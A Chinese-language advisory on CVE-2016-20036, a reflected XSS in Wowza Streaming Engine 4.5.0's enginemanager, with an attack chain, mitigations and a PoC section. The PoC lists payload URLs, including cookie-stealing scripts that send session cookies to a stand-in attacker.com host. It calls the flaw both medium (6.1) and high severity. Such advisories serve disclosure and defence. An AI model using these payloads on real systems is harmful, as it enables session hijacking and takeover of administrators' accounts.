CVE-2016-20036: Wowza Streaming Engine enginemanager反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2016-20036

漏洞类型

反射型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wowza Streaming Engine 4.5.0

漏洞概述

CVE-2016-20036是Wowza Streaming Engine 4.5.0版本中存在的一个高危安全漏洞。该漏洞属于反射型跨站脚本攻击(XSS)，主要影响enginemanager管理界面。攻击者通过在多个HTTP参数中注入恶意脚本代码，当受害者访问特制的URL时，恶意代码会在其浏览器会话中执行。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户账户、执行钓鱼攻击或传播恶意软件。由于该漏洞无需认证即可利用，且影响流媒体服务器的管理界面，因此对企业流媒体服务的安全性构成严重威胁。建议受影响的用户立即升级到最新版本并实施输入验证机制。

技术细节

该漏洞为反射型XSS，存在于Wowza Streaming Engine 4.5.0的enginemanager Web管理界面中。攻击原理是应用程序未对用户输入进行充分的HTML实体转义就直接输出到页面。攻击者可通过以下参数注入恶意JavaScript代码：appName、vhost、uiAppType、wowzaCloudDestinationType等。攻击者构造包含XSS payload的恶意URL并诱使管理员访问，当浏览器解析响应页面时，注入的脚本代码会被执行。攻击者利用此漏洞可获取管理员的会话Cookie、进行横向移动或植入后门。由于enginemanager具有高权限特性，成功利用此漏洞的攻击者可完全控制流媒体服务器。建议在服务器端对所有用户输入进行严格的白名单验证，并在输出时对特殊字符进行HTML实体编码。

攻击链分析

STEP 1

步骤1

攻击者识别目标Wowza Streaming Engine 4.5.0的enginemanager管理界面

STEP 2

步骤2

攻击者发现enginemanager中的反射型XSS漏洞，定位appName、vhost、uiAppType、wowzaCloudDestinationType等参数

STEP 3

步骤3

攻击者构造包含XSS payload的恶意URL，如在appName参数中注入<script>alert(document.cookie)</script>

STEP 4

步骤4

攻击者通过钓鱼邮件、社交工程或恶意网站诱导管理员访问该恶意URL

STEP 5

步骤5

管理员浏览器发送请求到服务器，服务器未过滤直接将参数值反射回HTML响应

STEP 6

步骤6

浏览器解析响应时执行注入的JavaScript代码，攻击者获取管理员Cookie或执行其他恶意操作

STEP 7

步骤7

攻击者利用窃取的会话Cookie劫持管理员账户，完全控制流媒体服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2016-20036 PoC - Reflected XSS in Wowza Streaming Engine -->
<!-- Target: Wowza Streaming Engine 4.5.0 enginemanager -->
<!-- Vulnerable Parameters: appName, vhost, uiAppType, wowzaCloudDestinationType -->

<!-- Basic XSS PoC -->
https://target:8080/enginemanager/server/serverhost.jsp?appName=<script>alert(document.cookie)</script>
https://target:8080/enginemanager/server/serverhost.jsp?vhost=<img src=x onerror=alert('XSS')>
https://target:8080/enginemanager/home/index.jsp?uiAppType=<script>alert(document.domain)</script>
https://target:8080/enginemanager/server/vhost.jsp?wowzaCloudDestinationType=<svg/onload=alert(document.cookie)>

<!-- Cookie Stealing PoC -->
https://target:8080/enginemanager/server/serverhost.jsp?appName=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Session Hijacking PoC -->
https://target:8080/enginemanager/home/index.jsp?uiAppType=<script>document.location='https://attacker.com/log?cookie='+document.cookie</script>

影响范围

Wowza Streaming Engine 4.5.0

防御指南

临时缓解措施

临时缓解措施：1) 在Web应用防火墙(WAF)中配置XSS防护规则，过滤包含<script>、<img>、<svg>等危险HTML标签的请求；2) 对enginemanager界面实施强制的身份认证和访问控制，限制暴露面；3) 监控管理界面的异常访问日志，及时发现潜在的探测和利用行为；4) 考虑临时禁用非必要的enginemanager功能以减少攻击面。